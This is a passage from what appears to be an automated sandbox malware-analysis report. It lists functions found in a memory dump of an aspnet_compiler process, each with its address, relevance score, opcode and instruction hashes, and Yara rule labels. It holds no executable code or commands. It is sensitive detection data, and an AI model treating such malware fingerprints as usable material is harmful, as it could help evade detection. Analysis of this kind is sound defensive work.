                                                              • Opcode Fuzzy Hash: fb37fd2c6766be81902d895a8f4ddc7272ccea2085fcc6cedc30de37074e3a4c
                                                              • Instruction Fuzzy Hash: 1E21EBB5E41209ABCB14DFAAD9849AEFBF9FF98610F10012EE409A7240D6709941CB64
                                                              Function 01A780A8 Relevance: .1, Instructions: 69COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                              • Instruction ID: 0d2e01f71b4a5fb494e19225a80aa7b6b5da099488734cb60b1d267d3ee8e57e
                                                              • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                              • Instruction Fuzzy Hash: B8218172900209FFDF129F98CC44B9EBBB9EF84320F214419F914A7251D738DA51CB50
                                                              Function 01A10124 Relevance: .1, Instructions: 68COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                              • Instruction ID: cc16e1a77536856e1eb9ad01491a70fd368efa3b524736ea1fa84e5d5635f516
                                                              • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                              • Instruction Fuzzy Hash: 8D110473600705BFE7229F58CE41F9ABBB8EB84794F114029F6048B190D675ED84CB60
                                                              Function 019E8770 Relevance: .1, Instructions: 68COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5966856658d9d3e44fccb9b1751c209bed8905f27fcf794d09b2064c1c0bb24c
                                                              • Instruction ID: 38edb6c1e739e13fe52d1a0e107555d7638c73a4ce79cea78bbf377fe1e5a0c6
                                                              • Opcode Fuzzy Hash: 5966856658d9d3e44fccb9b1751c209bed8905f27fcf794d09b2064c1c0bb24c
                                                              • Instruction Fuzzy Hash: 3F11C435740611DBDB13CF8DC4C4A2ABBE9AF8A711B19406DEE0D9F205D6B2D901C790
                                                              Function 01A1AAEE Relevance: .1, Instructions: 68COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                              • Instruction ID: c713254f7d352a6734b1c748cb6afe6b2639a3b8e9ab50f77ec72b2b17aa7e68
                                                              • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                              • Instruction Fuzzy Hash: 8C217972649A81DFDB329F49C540A66BBF6FB94B10F15883DE94A8B614C730EC01CB80
                                                              Function 019E80E9 Relevance: .1, Instructions: 66COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b1d9b123f281c5987c4808486e0466754cf6a660d9cc833f4ffef1ee9b727815
                                                              • Instruction ID: 755baebdbacb524f3c595cf784af5d78d6ed836ee5d785a396131e0afc0da0b2
                                                              • Opcode Fuzzy Hash: b1d9b123f281c5987c4808486e0466754cf6a660d9cc833f4ffef1ee9b727815
                                                              • Instruction Fuzzy Hash: 83218B35A40206EFCB15CF98C580AAEBBF9FB88318F20456DD109AB311CB71ED06CB90
                                                              Function 01A1674D Relevance: .1, Instructions: 65COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e4b201773fbdf0f1c2d28ad0c1525f0e10dabc3f7e0bee544785dd1c23cba0f4
                                                              • Instruction ID: dd122b72becd0c2a49ebf5b8e18929bfc66aa1b6995327a8034d61b9c410b719
                                                              • Opcode Fuzzy Hash: e4b201773fbdf0f1c2d28ad0c1525f0e10dabc3f7e0bee544785dd1c23cba0f4
                                                              • Instruction Fuzzy Hash: 7E219075600A01EFD7218F69C841F66B7F8FF84250F08882DE5AEC7250DBB0B840CB60
                                                              Function 01A0E8C0 Relevance: .1, Instructions: 63COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b9739da5ae14e805bfdfa5190aed97b6693592b3b41cbe8573237b804c071f71
                                                              • Instruction ID: b0efa10197f744731f04154d5ce28d857fb24c84ec4e7d0d2ecb7079171c8a62
                                                              • Opcode Fuzzy Hash: b9739da5ae14e805bfdfa5190aed97b6693592b3b41cbe8573237b804c071f71
                                                              • Instruction Fuzzy Hash: 251108323041149FCF1ADB69DD81A6BB266EBD57B4B294929D927CB290E9309802C790
                                                              Function 01A76870 Relevance: .1, Instructions: 63COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5d3cf178276fb12a6a431e164432eed045326a8a352cda691b23f05c04bc7706
                                                              • Instruction ID: d24ca9020ea368299b68b862144ae79cc2ce87926701607038629955c09a6004
                                                              • Opcode Fuzzy Hash: 5d3cf178276fb12a6a431e164432eed045326a8a352cda691b23f05c04bc7706
                                                              • Instruction Fuzzy Hash: 3A11E732240905EFE722CB9DCD40F9A77A8EF95750F114025F209DB250D670EE05C790
                                                              Function 01A166B0 Relevance: .1, Instructions: 61COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8ad7f7acae84faaea63edf8c09f497f878c5acd28f24e5f632fd76148a0cc177
                                                              • Instruction ID: 8e8027ce9b7a12c76a8be998ef4377c53445f7beb53c1865bae54e1af3673502
                                                              • Opcode Fuzzy Hash: 8ad7f7acae84faaea63edf8c09f497f878c5acd28f24e5f632fd76148a0cc177
                                                              • Instruction Fuzzy Hash: 2611E376A01205EFCB25CF59C580A5ABBF8EF94610B06407DD90DEB318F6B0DD00CB90
                                                              Function 01AAA8E4 Relevance: .1, Instructions: 61COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                              • Instruction ID: 3824654d760025d9755d91b771968d741fff4d2d915872817cb3d1b7d3239d44
                                                              • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                              • Instruction Fuzzy Hash: CC11C436A00915AFDB19CB58C815B9EFBF5EF84310F058269E855D7340E775EE51CB80
                                                              Function 019E0AD0 Relevance: .1, Instructions: 61COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                              • Instruction ID: c069dce7fc73d1caf7cf461738244e21a68cb48ea9d696daf7f1f2f0b1efb45c
                                                              • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                              • Instruction Fuzzy Hash: 2C2106B5A00B059FD7A0CF29D540B52BBF4FB48B20F10492EE98AC7B50E371E814CB90
                                                              Function 01A6E7E1 Relevance: .1, Instructions: 59COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                              • Instruction ID: 4d5f17cbcaa3b010a4e469d10174ef68299cf1ece3b048fd6ec996e5c9390c01
                                                              • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                              • Instruction Fuzzy Hash: D311CE3A600601EFEB22DF49C844F5ABBE9EF85754F05842CFA099B260DB31EC40DB90
                                                              Function 01A027ED Relevance: .1, Instructions: 58COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bd88e7531f378e28e13c0a2eb8b543dfb6c1af27a5fb5b3844db119d80fc689a
                                                              • Instruction ID: bf75db07a627016ee7d58e87e8c3fcab955af05f3eacda3cbe963cc98f66fb14
                                                              • Opcode Fuzzy Hash: bd88e7531f378e28e13c0a2eb8b543dfb6c1af27a5fb5b3844db119d80fc689a
                                                              • Instruction Fuzzy Hash: 1C012636345645ABE317A36EE848F276B9CEFD0354F090075FA068B280DA24DD08C2A1
                                                              Function 019E4690 Relevance: .1, Instructions: 57COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 53e24668c895c8bfbc3e1f9196874cab369a0e374a3023aafb322017f35c9fa0
                                                              • Instruction ID: 0c93c5bf2880394dde578a8f60ad858032308cde57cea0839d1b2bb3873038a1
                                                              • Opcode Fuzzy Hash: 53e24668c895c8bfbc3e1f9196874cab369a0e374a3023aafb322017f35c9fa0
                                                              • Instruction Fuzzy Hash: 0711E036285644AFDB26CF59D988F567BE8EB85B65F004519F90CCB350C331E800CFA0
                                                              Function 01A16620 Relevance: .1, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c0b6208541ff46e664c146277ed6d5c50ca3218cf0eade101faf5b1945eaaddc
                                                              • Instruction ID: 94fd6820a4ddf593cd162fe40024428e21d637377cad1bcb5fbbaa50a0838416
                                                              • Opcode Fuzzy Hash: c0b6208541ff46e664c146277ed6d5c50ca3218cf0eade101faf5b1945eaaddc
                                                              • Instruction Fuzzy Hash: B5110236A00616ABDB22EF59C980B5EFBB8FF84750F510818DA19A7204D774AD01CB50
                                                              Function 01A0EA2E Relevance: .1, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 26c1a3c504f4039dff0957c158449a8951f0ca1414e8f2dc3146cfbd3ebbd6e0
                                                              • Instruction ID: 27253e329748337afbb3f56f3e38b98114684f860dacd4fdda1eb2e5929b256c
                                                              • Opcode Fuzzy Hash: 26c1a3c504f4039dff0957c158449a8951f0ca1414e8f2dc3146cfbd3ebbd6e0
                                                              • Instruction Fuzzy Hash: 75012875A01509DFC726DF19E508F26BBF9FBC9315F20856AE10A8B2A0C770DC86CB90
                                                              Function 01A0E53E Relevance: .1, Instructions: 55COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                              • Instruction ID: 159c6f79b4b24b654434afe9d1cbc1406189a7365ec433339669257adf3a0412
                                                              • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                              • Instruction Fuzzy Hash: 3411E5722016C29FE723972CD954B257BA4AB80748F1D18A0DE41D76D3F329D842D350
                                                              Function 01A6E75D Relevance: .1, Instructions: 54COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                              • Instruction ID: d860791df0a3a77b9c793b6b9d904e06d116451542a039a2f16d57c007320f7c
                                                              • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                              • Instruction Fuzzy Hash: ED01B53A600105BFEB22DF59CD04F5ABBADEF85B54F158424EA09DB260E779DD40C790
                                                              Function 019DA250 Relevance: .1, Instructions: 52COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                              • Instruction ID: a34ddb91700c3d4c88e7b6e08b6406cb9e893d5f7e9d3d87f28644deb19df7c8
                                                              • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                              • Instruction Fuzzy Hash: A401D6725057219BCB318F1AD840A367BE9EF55761700C92DFE998B691D735D420CB60
                                                              Function 01A5E1D0 Relevance: .1, Instructions: 51COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 57439a0ba5cb3cf2e9380e4230a4ea21e70a1baba55d0ec73acf39fada79f81f
                                                              • Instruction ID: 0c52e9bf0d2e66f7dcbdcd4aad5f1108eb4a49d7bfac01815d3ef990b18cbeee
                                                              • Opcode Fuzzy Hash: 57439a0ba5cb3cf2e9380e4230a4ea21e70a1baba55d0ec73acf39fada79f81f
                                                              • Instruction Fuzzy Hash: 1411A131641641EFDB16EF19CD90F16BBB8FF98B94F140065ED099B651C635EE01CB90
                                                              Function 019E6259 Relevance: .1, Instructions: 51COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 32772ab269732039ebf686deb30596027b56fa2bb18b760353f58766b84f7f8f
                                                              • Instruction ID: e0ec7c1bd53535d86824097198ef7443a8d78c3dea7e4a64c565781d8dabbd75
                                                              • Opcode Fuzzy Hash: 32772ab269732039ebf686deb30596027b56fa2bb18b760353f58766b84f7f8f
                                                              • Instruction Fuzzy Hash: 4B119A70541229ABDB26AB28CE52FE8B2B8BF18710F504195A718E61E0DA309E81CF84
                                                              Function 01A16DA0 Relevance: .1, Instructions: 51COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c0ec4d266471c9547166acc1fd1eb763428ac71706b94ce862d4cb5f0fc29682
                                                              • Instruction ID: e03b74d1a8e9560ff80605efbaa093c5b3469a71d50d8633926a782bb081cf28
                                                              • Opcode Fuzzy Hash: c0ec4d266471c9547166acc1fd1eb763428ac71706b94ce862d4cb5f0fc29682
                                                              • Instruction Fuzzy Hash: 8E014CB270411577EF259B19C804BAF7F64DB80B50F094219BA0EDB2D4D7B8D880C3E0
                                                              Function 019D6DF6 Relevance: .1, Instructions: 51COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 963beffad11e43059af7af2ccb7b0cd7434a49ac6f9fc9f92805e8b750cddf95
                                                              • Instruction ID: 042203a2196b967f30c1db40537196a61f52559a74b0b45d37b881bf8a67975b
                                                              • Opcode Fuzzy Hash: 963beffad11e43059af7af2ccb7b0cd7434a49ac6f9fc9f92805e8b750cddf95
                                                              • Instruction Fuzzy Hash: 3C01B172700B02AFCB216F69D844A677BB9FFD8329B100528F94A83651DB71EC15C7E0
                                                              Function 019E208A Relevance: .0, Instructions: 50COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                              • Instruction ID: e39019cec94dac12ebd846dbd53b2abe755c27436602d85941605c6819e9864d
                                                              • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                              • Instruction Fuzzy Hash: 0301F1326002009FEF168B69D884FA27BAEBFC4701F1944A9ED098F286DA71CC81C390
                                                              Function 01A66050 Relevance: .0, Instructions: 50COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 31c6c33d7f7335bb81ff799e18b588447627e0198da4d5c9dca083fc6f2fce78
                                                              • Instruction ID: 22166728f9ee529eb319b860aa43d635c3f004514d681043b309a28f039552f6
                                                              • Opcode Fuzzy Hash: 31c6c33d7f7335bb81ff799e18b588447627e0198da4d5c9dca083fc6f2fce78
                                                              • Instruction Fuzzy Hash: A4111772900019ABCB15DB94CC84DEFBBBCEF48254F054166E91AE7211EA34AA15CBA0
                                                              Function 01A76500 Relevance: .0, Instructions: 50COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6dc9de197b34fb954a1bd667d771976eac655a2dde7cc06a7ff08bef44ad41ff
                                                              • Instruction ID: 3ab854b850be13432ef1263fba99748e5c705181e583f7875fdc685432f074fc
                                                              • Opcode Fuzzy Hash: 6dc9de197b34fb954a1bd667d771976eac655a2dde7cc06a7ff08bef44ad41ff
                                                              • Instruction Fuzzy Hash: 4D1104326405469FE301CF28D800BA2BBB9FB9A304F088159E849CB315D732ED81DBA0
                                                              Function 01A6C810 Relevance: .0, Instructions: 50COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a344e2f9fc8b4c252f7e402521c98327462402d8a8b59a5f763fe822ef7af281
                                                              • Instruction ID: aac4688df583c166c81b81bb76a8462efe9874d5de57d153d957e9633b47e7a8
                                                              • Opcode Fuzzy Hash: a344e2f9fc8b4c252f7e402521c98327462402d8a8b59a5f763fe822ef7af281
                                                              • Instruction Fuzzy Hash: 551118B1E00219ABCB00DFA9D541AAEBBF8FF58350F10406AE905E7351D674EA01CBA4
                                                              Function 01A8EA60 Relevance: .0, Instructions: 50COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: eb6f4549e74856bda5e95525e32bab6d6b12a77dc429abdf2efe72b700dc8427
                                                              • Instruction ID: 47bc8c1fec3e500bc90a9f1027a2f3466f392d7b05b9f878691b55af0aa49641
                                                              • Opcode Fuzzy Hash: eb6f4549e74856bda5e95525e32bab6d6b12a77dc429abdf2efe72b700dc8427
                                                              • Instruction Fuzzy Hash: 5A017131541611EBCB32BB198444A76FBB9FF91E62F05442EE65A5B611CB20DC41CB91
                                                              Function 01A220F0 Relevance: .0, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4b513fbdee51bf9d7fb26d2f47d828f3de75b8d1bde46b1792ca85a801b6fa32
                                                              • Instruction ID: 85e77b82862560c6ba65e9cc68ae6649d3d87bfe79da374c22daf076e6ee91e8
                                                              • Opcode Fuzzy Hash: 4b513fbdee51bf9d7fb26d2f47d828f3de75b8d1bde46b1792ca85a801b6fa32
                                                              • Instruction Fuzzy Hash: 01118075A0125DAFCB15DF68C950FAE7BB5FB48350F104059FD059B290DA35EE11CB90
                                                              Function 019DC020 Relevance: .0, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                              • Instruction ID: e8da5c97d78ff69ce0c472f4be6cf79eb9a051c39a41586a821d5ee0c11d25e0
                                                              • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                              • Instruction Fuzzy Hash: 8001D232100705EBEF229ABAC900FA777ADBBD5210F44881DA64A8B580DA70E402C750
                                                              Function 01A1E5CF Relevance: .0, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 618ded913ecf1f95e8c8b8f32d55669cc7cc9ee946a57aa4e194e0098d084990
                                                              • Instruction ID: de9af09100c42c24e7b123a1632c944ab316f1b814a7e84897e9c74ec88fdb6e
                                                              • Opcode Fuzzy Hash: 618ded913ecf1f95e8c8b8f32d55669cc7cc9ee946a57aa4e194e0098d084990
                                                              • Instruction Fuzzy Hash: 59018FB2601A02BFD712AB79CD84F57BBBCFB947A4B050629B60D87551DB74EC01C7A0
                                                              Function 01A769C0 Relevance: .0, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5e6695781c4d67d35b5084b598ed8ae497aa17fc2412cac96184966f67dbdde9
